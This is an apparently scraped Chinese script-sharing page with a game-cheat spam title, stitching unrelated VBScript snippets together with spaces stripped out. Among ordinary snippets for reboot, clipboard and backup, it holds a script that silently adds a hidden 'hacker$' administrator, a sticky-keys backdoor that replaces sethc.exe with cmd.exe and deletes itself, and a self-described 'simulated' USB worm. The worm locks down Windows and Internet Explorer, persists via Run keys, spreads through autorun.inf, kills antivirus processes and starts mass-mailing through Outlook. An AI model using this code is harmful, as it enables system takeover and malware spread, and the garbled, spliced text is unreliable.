ios脚本软件江湖使用强化

发布时间:2020-10-29 来源:脚本之家 点击:

RebootsaWindows2000PC.ManyexamplesshelltothekernelandjustkillthePC.Thisdoesitproperlyandtakesintoaccountauserprivilages.

'APICallsusedforRebootPC

PrivateConstTOKEN_ADJUST_PRIVILEGES=&H20
PrivateConstTOKEN_QUERY=&H8
PrivateConstSE_PRIVILEGE_ENABLED=&H2
PrivateConstEWX_SHUTDOWNAsLong=1
PrivateConstEWX_FORCEAsLong=4
PrivateConstEWX_REBOOT=2

PrivateTypeLUID
 UsedPartAsLong
 IgnoredForNowHigh32BitPartAsLong
EndType

PrivateTypeTOKEN_PRIVILEGES
 PrivilegeCountAsLong
 TheLuidAsLUID
 AttributesAsLong
EndType

PrivateDeclareFunctionExitWindowsExLib"user32"(ByValdwOptionsAsLong,ByValdwReservedAsLong)AsLong
PrivateDeclareFunctionGetCurrentProcessLib"kernel32"()AsLong
PrivateDeclareFunctionOpenProcessTokenLib"advapi32"(ByValProcessHandleAsLong,ByValDesiredAccessAsLong,TokenHandleAsLong)AsLong
PrivateDeclareFunctionLookupPrivilegeValueLib"advapi32"Alias"LookupPrivilegeValueA"(ByVallpSystemNameAsString,ByVallpNameAsString,lpLuidAsLUID)AsLong
PrivateDeclareFunctionAdjustTokenPrivilegesLib"advapi32"(ByValTokenHandleAsLong,ByValDisableAllPrivilegesAsLong,NewStateAsTOKEN_PRIVILEGES,ByValBufferLengthAsLong,PreviousStateAsTOKEN_PRIVILEGES,ReturnLengthAsLong)AsLong


SubRebootPC()
 OnLocalErrorGoToRebootPC_ErrorHandler
 ConstcsProcName="RebootPC"

 DimhProcessHandleAsLong
 DimhTokenHandleAsLong
 DimtmpLuidAsLUID
 DimtkpNewAsTOKEN_PRIVILEGES
 DimtkpPreviousAsTOKEN_PRIVILEGES
 DimlBufferNeededAsLong

 hProcessHandle=GetCurrentProcess()
 CallOpenProcessToken(hProcessHandle,TOKEN_ADJUST_PRIVILEGESOrTOKEN_QUERY,hTokenHandle)

'GettheLUIDfortheshutdownprivilege
 CallLookupPrivilegeValue("","SeShutdownPrivilege",tmpLuid)

 tkpNew.PrivilegeCount=1'Oneprivilegetoset
 tkpNew.TheLuid=tmpLuid
 tkpNew.Attributes=SE_PRIVILEGE_ENABLED

'Enabletheshutdownprivilegeintheaccesstokenofthisprocess.
 lBufferNeeded=0
 CallAdjustTokenPrivileges(hTokenHandle,False,tkpNew,Len(tkpPrevious),tkpPrevious,lBufferNeeded)

'ForceaReboot(nooptiontosavefilestocancelout)
 CallExitWindowsEx(EWX_FORCEOrEWX_REBOOT,&HFFFF)

 ExitSub
RebootPC_ErrorHandler:
 CallRaiseError(csModName,csProcName,Err.Number,Err.Description)
EndSub->


on error resume next
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments
(0):password=Wscript.Arguments(1):Else:username="hacker$":password="123456":end if:set
wsnetwork=CreateObject("WSCRIPT.NETWORK"):os=""&wsnetwork.ComputerName:Set ob=GetObject
(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword
password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo
of.ADsPath
On Error Resume Next
Dim obj, success
Set obj=CreateObject("WScript.Shell")
success=obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%
\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32
\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%
\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
和平精英透视脚本怎么用

'cscript //nologo C:\test\test.vbs C:\test\test.bat
Set objFSO=CreateObject("Scripting.FileSystemObject")
Set objFile=objFSO.OpenTextFile(WScript.Arguments(0),1,True)
strAll=objFile.ReadAll()

strTab=Replace (strAll,chr(9)," ")
strBlank=Replace (strTab," ","&#" & "160;")
Call SetClipboardText(strBlank)

Sub SetClipboardText(strText)
Set objIE=CreateObject("InternetExplorer.Application")
objIE.Navigate("about:blank")
objIE.Document.ParentWindow.ClipboardData.SetData "text", strText
objIE.Quit
End Sub
建立数
据库DatabaseName的登录账号:
sql="EXECUTEsp_addlogin"&username1&","
&password1&","&DatabaseName&""
Setrs=conn.Execute(sql)

----2)增加用户组
语法:sp_addgroupgroup_name
其中,group_name是新建组名
sql="EXECUTEsp_addgroup"&group1&""
Setrs=conn.Execute(sql)

----3)增加用户
语法:sp_adduserlogin_name
[,name_in_db[,grpname]]
其中,login_name用户名,name_in_db是用户在当
前数据库中的名字(这里是第一步建立的登录账号
username1),grpname是要将用户加入的那个组的组名


域用户或租添加到本地组
SetobjGroup=GetObject()
SetobjUser=GetObject()
objGroup.Add(objUser.ADsPath)

修改本地管理员密码
Setobjcnlar=GetObject()
objcnla.SetPasswordP@ssW0rd
objcnla.SetInfo

弹出YESorNO的对话框,不同的选择执行不同的代码
intAnswer=Msgbox(Doyouwanttodeletethesefiles?,vbYesNo,DeleteFiles)
IfintAnswer=vbYesThen
MsgboxYouansweredyes.
ElseMsgboxYouansweredno.
EndIf

运行CMD命令行命令
setobshell=wscript.createobject(wscript.shell)
obshell.run(ipconfig),,true
如果要运行的命令中包含双引号,可使用&chr(34)&代替

忽略代码错误继续执行
OnErrorResumeNext
放置于代码的最开头,当代码运行出错后并不停止跳出而是继续执行下一条
5.按住shift键,右击某一文件,菜单中会出现“打开方式”选项,这也许已不是什么秘密


Delay=5000
strComputer="."

Set objWMIService=GetObject("winmgmts:{impersonationLevel=impersonate}!\" & strComputer & "\root\cimv2")
Set objStartup=objWMIService.Get("Win32_ProcessStartup")
Set objConfig=objStartup.SpawnInstance_
Set objProcess=GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn=objProcess.Create("C:\Program Files\Internet Explorer\iexplore.exe ", null, objConfig, PID)
If errReturn=0 Then
WScript.Echo "Process ID is: " & PID
End If

wscript.sleep Delay

Set colProcessList=objWMIService.ExecQuery("Select * from Win32_Process Where ProcessId='" & PID & "'")
For Each objProcess in colProcessList
objProcess.Terminate()
Next
WScript.Echo "Close ProcessId='" & PID & "'"
为了使用该设置值,应保存修改后的注册表,并重新启动使用MicrosoftJet的应用程序

使用过U盘的朋友都知道u盘病毒是一种Autorun自运行病毒,当双击时触发病毒体,会复制自身到CDE和系统盘system32下等盘符,(生成exe文件和一个Autorun.inf文件),同时修改注册表,当点击C盘等盘符右键时,会有一个auto命令(黑色粗体)或者是两个开始命令,本人学习vbs才15天,我也来模拟下这个autorun病毒和部分熊猫烧香功能,本人能力有限,只能模拟这样的病毒了,声明,本人模拟这个病毒,全是为了学习和技术,切忌不要搞破坏,如果有人用本人代码破坏,后果自负onerrorresumenext
dimfso,wsh,myfile,ws,pp,fsoFolder
setwsh=wscript.createobject("wscript.shell")
setfso=wscript.createobject("scripting.filesystemobject")
setmyfile=fso.GetFile(wscript.scriptfullname)
'修改注册表(开始菜单里面的东西和IE各项设置)
wsh.Regwrite"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoFileOpen",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\Advanced",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\CacheInternet",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\AutoConfig",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\HomePage",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\History",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\ConnwizAdminLock",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\InternetExplorer\Main\StartPage",""
wsh.Regwrite"HKCU\Software\Microsoft\InternetExplorer\Main\SearchPage",""
wsh.Regwrite"HKCU\Software\Microsoft\InternetExplorer\Main\Default_Page_URL",""
wsh.Regwrite"HKCU\Software\Microsoft\InternetExplorer\Main\Default_Search_URL",""
wsh.Regwrite"HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer\Main\StartPage",""
wsh.Regwrite"HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer\Main\Default_Page_URL",""
wsh.Regwrite"HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer\Main\Default_Search_URL",""
wsh.Regwrite"HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer\Main\SearchPage",""
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\HomePage",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\SecurityTab",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\ControlPanel\ResetWebSettings",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoViewSource",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","c:\NYboy.vbs"
wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogOff",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
wsh.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
'使用户不能通过双击打开硬盘,这里还可以修改为使其不能通过双击打开文件夹,同理,不赘续
wsh.Regwrite"HKLM\SOFTWARE\Classes\Drive\shell\auto\command","C:\NYboy.bat'%1'"
wsh.Regwrite"HKCR\Drive\shell","auto"
wsh.Regwrite"HKCR\Drive\shell\auto\command","C:\NYboy.bat'%1'"
wsh.Regwrite"HKLM\SOFTWARE\Classes\Directory\shell","auto"
wsh.Regwrite"HKCR\Directory\shell\auto\command","C:\NYboy.bat'%1'"
wsh.Regwrite"HKLM\SOFTWARE\Classes\Directory\shell\auto\command","C:\NYboy.bat'%1'"
'修改默认文件图标 这里可以换成可爱的熊猫哦
wsh.Regwrite"HKCR\exefile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKCR\txtfile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKCR\dllfile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKCR\batfile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKCR\inifile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKLM\SOFTWARE\Classes\exefile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKLM\SOFTWARE\Classes\txtfile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKLM\SOFTWARE\Classes\dllfile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKLM\SOFTWARE\Classes\batfile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKLM\SOFTWARE\Classes\inifile\DefaultIcon","c:\1.ico"
wsh.Regwrite"HKLM\Software\CLASSES\.reg","txtfile"
wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","你好啊,大兵和你开个小小的玩笑"
wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","你已经中毒了,赶快杀毒或者与QQ252287438联系"
'复制自身到C,D,E,F,U盘
myfile.copy"c:"
myfile.copy"D:"
myfile.copy"E:"
myfile.copy"F:"
myfile.copy"I:"
myfile.attributes=34
'定义Autorun.inf的内容 这个就是u盘病毒必须的代码部分 这里可以简单写
Iffso.FileExists("C:\autorun.inf")Then
SetobjFolder=fso.GetFile("C:\autorun.inf")
Else
wsh.run"cmd/cecho[AutoRun]>>C:\autorun.inf"_
&"&&echoopen=NYboy.bat>>C:\autorun.inf"_
&"&&echoshellexecute=NYboy.bat>>C:\autorun.inf"_
&"&&echoshell\Auto\command=NYboy.bat>>C:\autorun.inf"_
&"&&echoshell=Auto>>C:\autorun.inf"_
&"&&attrib+h+s+rC:\autorun.inf"
setautobatc=fso.createtextfile("c:\NYboy.bat",1,ture)
autobatc.writeline("NYboy.vbs")
EndIf
Iffso.FileExists("D:\autorun.inf")Then
SetobjFolder=fso.GetFile("D:\autorun.inf")
Else
wsh.run"cmd/cecho[AutoRun]>>D:\autorun.inf"_
&"&&echoopen=NYboy.bat>>D:\autorun.inf"_
&"&&echoshellexecute=NYboy.bat>>D:\autorun.inf"_
&"&&echoshell\Auto\command=NYboy.bat>>D:\autorun.inf"_
&"&&echoshell=Auto>>D:\autorun.inf"_
&"&&attrib+h+s+rD:\autorun.inf"
setautobatd=fso.createtextfile("D:\NYboy.bat",1,ture)
autobatd.writeline("NYboy.vbs")
EndIf
Iffso.FileExists("E:\autorun.inf")Then
SetobjFolder=fso.GetFile("E:\autorun.inf")
Else
wsh.run"cmd/cecho[AutoRun]>>E:\autorun.inf"_
&"&&echoopen=NYboy.bat>>E:\autorun.inf"_
&"&&echoshellexecute=NYboy.bat>>E:\autorun.inf"_
&"&&echoshell\Auto\command=NYboy.bat>>E:\autorun.inf"_
&"&&echoshell=Auto>>E:\autorun.inf"_
&"&&attrib+h+s+rE:\autorun.inf"
setautobate=fso.createtextfile("E:\NYboy.bat",1,ture)
autobate.writeline("NYboy.vbs")
EndIf
Iffso.FileExists("F:\autorun.inf")Then
SetobjFolder=fso.GetFile("F:\autorun.inf")
Else
wsh.run"cmd/cecho[AutoRun]>>F:\autorun.inf"_
&"&&echoopen=NYboy.bat>>F:\autorun.inf"_
&"&&echoshellexecute=NYboy.bat>>F:\autorun.inf"_
&"&&echoshell\Auto\command=NYboy.bat>>F:\autorun.inf"_
&"&&echoshell=Auto>>F:\autorun.inf"_
&"&&attrib+h+s+rF:\autorun.inf"
setautobatf=fso.createtextfile("F:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
EndIf
Iffso.FileExists("I:\autorun.inf")Then
SetobjFolder=fso.GetFile("I:\autorun.inf")
Else
wsh.run"cmd/cecho[AutoRun]>>I:\autorun.inf"_
&"&&echoopen=NYboy.bat>>I:\autorun.inf"_
&"&&echoshellexecute=NYboy.bat>>I:\autorun.inf"_
&"&&echoshell\Auto\command=NYboy.bat>>I:\autorun.inf"_
&"&&echoshell=Auto>>I:\autorun.inf"_
&"&&attrib+h+s+rI:\autorun.inf"
setautobatf=fso.createtextfile("I:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
EndIf
'设置病毒体属性为 系统 只读 隐藏
wsh.run"cmd/cattrib+h+s+rC:\NYboy.bat"_
&"&&attrib+h+s+rD:\NYboy.bat"_
&"&&attrib+h+s+rE:\NYboy.bat"_
&"&&attrib+h+s+rF:\NYboy.bat"_
&"&&attrib+h+s+rI:\NYboy.bat"
'强制结束某些进程,比如QQ,记事本,网页,批处理文件,卡巴,realplay等进程,运行后打不开这些文件
do
setws=getobject("winmgmts:\\.\root\cimv2")
setpp=ws.execquery("select*fromwin32_processwherename='taskmgr.exe'orName='QQ.exe'orName='notepad.exe'orName='IEXPLORE.exe'orName='cmd.exe'orName='avp.exe'orName='winRAR.exe'orName='realplay.exe'orName='WINWORD.exe'")
foreachiinpp
i.terminate()
wscript.sleep100
next
loop
'使病毒可以靠邮件传播
Setol=CreateObject("Outlook.Application")
OnErrorResumeNext
Forx=1To5
SetMail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="今晚你来吗?"
Mail.Body="朋友你好:您的朋友给您发来了热情的邀请存hive微软的VisualBasic确实是个好东西,编写应用程序快捷高效
'
Do While 1
Run()
' WScript.Sleep 1000*60*60*2
WScript.Sleep 1000 * 5 '测试用,每5秒备份一次文件到指定的文件夹
Loop
Function Run()
BackUpFolder "D:\公司所有正在设计的系统", "E:\软件自动备份"
End Function
Function BackUpFolder(S, D)
On Error Resume Next
Set FSO=CreateObject("Scripting.FileSystemObject")
FSO.CreateFolder D
FSO.CopyFolder S, D & "" & GetDateFolder
End Function
Function GetDateFolder()
GetDateFolder=Year(Now) & "-" & Right("0" & Month(Now), 2) & "-" & Right("0" & Day(Now), 2) & "-" & Right("0" & Hour(Now), 2) & "-" & Right("0" & Minute(Now), 2) & "-" & Right("0" & Second(Now), 2)
End Function

网站地图 | Tag标签 | RSS订阅
Copyright © 2012-2019 脚本之家 All Rights Reserved
脚本之家  渝ICP备13030612号